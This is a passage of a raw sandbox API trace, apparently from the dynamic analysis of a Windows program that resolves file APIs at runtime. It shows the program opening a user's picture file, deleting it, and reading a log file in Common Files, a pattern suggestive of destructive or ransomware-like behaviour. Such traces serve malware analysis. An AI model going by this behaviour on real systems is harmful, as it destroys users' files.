lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.131] CharLowerBuffW (in: lpsz="byte[14886]", cchLength=0xb | out: lpsz="byte[14886]") returned 0xb [0041.131] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.131] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0041.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.132] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.132] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0041.132] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0041.132] FreeLibrary (hLibModule=0x76b40000) returned 1 [0041.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0041.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0041.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0041.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0041.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0041.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0041.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0041.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0041.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0041.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0041.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0041.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0041.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0041.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0041.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0041.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.133] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.133] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.133] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.133] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0041.133] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.133] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.133] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.133] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.133] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.133] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.133] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.134] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.134] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.134] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.134] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.134] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.134] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.134] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.134] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.134] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.134] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0041.134] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.134] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\jn9u.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0041.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0041.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0041.134] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0041.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0041.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0041.135] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.135] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0041.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0041.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0041.135] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0041.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.135] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0041.135] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0041.135] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0041.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0041.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0041.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0041.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0041.135] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0041.135] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0041.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.136] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0041.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88cda8 [0041.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88cda8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0041.136] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.136] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0041.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0041.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0041.136] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0041.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0041.136] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0041.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0041.136] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0041.136] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0041.136] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0041.136] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0041.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0041.137] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0041.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.137] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdf0 [0041.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cdf0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0041.137] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.137] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0041.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0041.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.137] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0041.137] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.137] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0041.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0041.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0041.138] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.138] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg", lpFilePart=0x0) returned 0x3c [0041.138] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb975d470, ftCreationTime.dwHighDateTime=0x1d5b5db, ftLastAccessTime.dwLowDateTime=0x5d448bc0, ftLastAccessTime.dwHighDateTime=0x1d5c2ff, ftLastWriteTime.dwLowDateTime=0x183a0e60, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x3a26, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="jn9U.jpg", cAlternateFileName="")) returned 0x7c2240 [0041.138] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\jn9u.jpg")) returned 1 [0041.139] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb975d470, ftCreationTime.dwHighDateTime=0x1d5b5db, ftLastAccessTime.dwLowDateTime=0x5d448bc0, ftLastAccessTime.dwHighDateTime=0x1d5c2ff, ftLastWriteTime.dwLowDateTime=0x183a0e60, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x3a26, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="jn9U.jpg", cAlternateFileName="")) returned 0 [0041.139] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0041.139] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.140] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0041.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0041.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0041.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0041.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0041.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0041.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.140] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.141] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.141] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0041.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.141] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0041.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.141] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0041.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0041.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.141] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0041.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0041.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0041.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.141] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.142] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.142] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.142] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0041.142] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.142] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.143] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0041.143] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x3056, lpOverlapped=0x0) returned 1 [0041.144] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0041.144] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x3056, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.144] SetFilePointerEx (in: hFile=0x128, 